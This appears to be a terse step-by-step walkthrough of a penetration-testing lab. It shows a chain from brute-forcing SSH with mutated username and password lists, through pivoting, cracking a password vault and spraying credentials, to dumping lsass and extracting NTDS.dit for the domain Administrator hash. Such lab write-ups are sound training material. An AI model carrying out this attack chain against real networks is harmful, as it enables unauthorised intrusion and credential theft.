1) given first and last name as well as a commonly reused password 1) also a topology of targets 2) `nmap` shows only ssh open on DMZ01 3) generate mutated username list with `username-anarchy` 4) generate custom `hashcat` rule and leverage to generated a mutated password list 5) brute-force DMZ01 with `hydra` based on mutated username and password lists 6) enumerate DMZ01 using common cred hunting methods 1) creds for hwilliam related to FILE01 within `.bash_history` 7) pivot into internal network with `ligolo-ng` OR `ssh -D` + `proxychains4` (tested both methods) 8) `smbclient` into FILE01 with hwilliam 1) need domain preceding username to connect 2) loot a password safe v3 vault 9) use `pwsafe2john` to generate hash of vault's password and crack with `john` by specifying `--format=pwsafe` 1) loot more creds 2) note that this is an old backup 10) generate hosts, creds, names, passwords files for `netexec` (`nxc`) spraying 11) `smbclient` into FILE01 with bdavid 1) dead-end 12) `nxc rdp` scan all hosts 1) bdavid rdp PWNED on JUMP01 13) `xfreerdp3` into JUMP01 as bdavid 14) check privs with `whoami /all` and `whoami /priv` 1) we have local admin and remote mgmt 15) `evil-winrm` into JUMP01 with bdavid for easy file transfer 1) make local copy of `lsass.dmp` and move to Kali 16) `pypykatz` on lsass.dmp 1) NT hash for JUMP01$ (machine account) 2) new password for stom 17) `nxc` scans with stom 1) stom winrm PWNED on DC01 18) `evil-winrm` into DC01 with stom for easy file transfer 19) check privs with `whoami /all` and `whoami /priv` 1) we have all privs 20) create copy of `HKLM\system` and move to Kali 21) create volume shadow copy of `C:\` and extract `NTDS.dit`, then move to Kali 22) `impacket-secretsdump` to reveal Administrator's NTLM hash